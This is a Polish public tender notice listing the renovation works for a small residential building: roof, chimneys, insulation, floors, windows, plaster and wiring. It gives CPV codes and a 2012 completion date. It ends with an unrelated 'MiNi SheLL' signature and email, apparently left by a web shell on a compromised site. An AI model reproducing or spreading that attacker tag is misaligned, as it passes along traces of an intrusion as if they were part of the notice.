Budynek mieszkalny składa się z: dwóch pokoi, kuchni, komórki, spiżarki, korytarza, przedsionka.
Powierzchnia użytkowa budynku wynosi 52, 93 m2

Zakres robót budowlanych remontowych jaki należy wykonać określa wyszczególnienie przedmiaru robót:
B1. Zakres remontu obejmuje:
1. Przemurowanie komina
a) przemurowanie kominów,
	b) spoinowanie ścian kominów
	c) wykonanie obróbki blacharskiej kominów
	2. Pokrycie oraz konstrukcja dachu
	a) demontaż pokrycia dachu z blachy falistej,
	b) demontaż obróbek blacharskich wiatrownic,
	c) demontaż pokrycia dachu z papy na konstrukcji drewnianej,
	d) wymiana deskowania dachu z desek ułożonych na styk,
	e) wymiana elementów drewnianych konstrukcji dachu,
	f) obróbki blacharskie dachu,
	g) montaż rynien dachowych i lejów spustowych, rynien spustowych
	h) pokrycie dachu papą termozgrzewalną,
	i) remont włazu dachowego.
3. Ocieplenie stropodachu
a) wykonanie konstrukcji rusztów pod okładziny,
b) wykonanie izolacji przeciwwilgociowej,
c) wykonanie izolacji termicznej,
d) wykonanie okładzin z płyty gipspwp - kartonowej,
e) wykonanie tynków na sufitach,
f) malowanie tynków.
4. Strop nad parterem
a) wymiana elementów podłóg z desek,
b) demontaż istniejącej izolacji,
c) wykonanie izolacji przeciwwilgociowej,
d) wykonanie izolacji termicznej,
e) wzmocnienie drewnianych belek stropowych,
f) wykonanie odgrzybienia elementów drewnianych,
g) wykonanie impregnacji grzybobójczej elementów drewnianych.
5. Schody wewnętrzne
a) wymiana elementów drewnianych schodów,
b) wymiana poręczy drewnianych schodów.
6. Piece i trzon kuchenny
a) przestawienie pieca kaflowego,
b) przestawienie trzonu kuchennego licowanego kaflami.
7. Podłogi i posadzki
a) rozbiórka podłóg i legarów drewnianych w pokojach,
b) rozbiórka elementów konstrukcji betonowych,
c) wykonanie wykopów wewnątrz budynku przy istniejących fundamentach,
d) wykonanie podkładów betonowych na podłożu gruntowym,
e) wykonanie izolacji przeciwwilgociowej i termicznej,
f) wykonanie warstw wyrównawczych,
g) wykonanie wykładzin z PCW.
8. Wymiana stolarki okiennej i drzwiowej
a) demontaż zużytej stolarki okiennej i drzwiowej,
b) wykucie z muru ościeżnic drewnianych,
c) montaż stolarki okiennej,
d) montaż stolarki drzwiowej.
9. Tynki wewnętrzne
 a) odbicie tynków wewnętrznych,
 b) przygotowanie i naprawa podłoża, gruntowanie,
 c) wykonanie tynków wewnętrznych,
 d) wykonanie okładzin na stropach, rusztach metalowych,
 e) wykonanie malowania farbami emulsyjnymi powierzchni wewnątrz.
10. Izolacja ścian fundamentowych
a) roboty ziemne fundamentowe, oczyszczenie muru, impregnacja muru,
b) wykonanie tynków renowacyjnych,
c) wykonanie izolacji termicznej muru,
d) wykonanie izolacji przeciwwilgociowej ścian fundamentowych,
e) wykonanie opaski betonowej na podłożu gruntowym przy budynku,
f) montaż daszku nad wejściem do budynku,
g) wykonanie ocieplenia ścian budynku,
h) demontaż obróbek parapetów blaszanych,
i) zbicie tynków z zaprawy cementowo - wapiennej,
j) wykonanie obróbek z blachy powlekanej,
11. Transport gruzu, ziemi i utylizacja papy
a) wywiezienie gruzu,
b) wywiezienie ziemi,
c) utylizacja papy.
12. Wymiana instalacji elektrycznej
a) wymiana instalacji elektrycznej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.21.13.41-2, 45.30.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com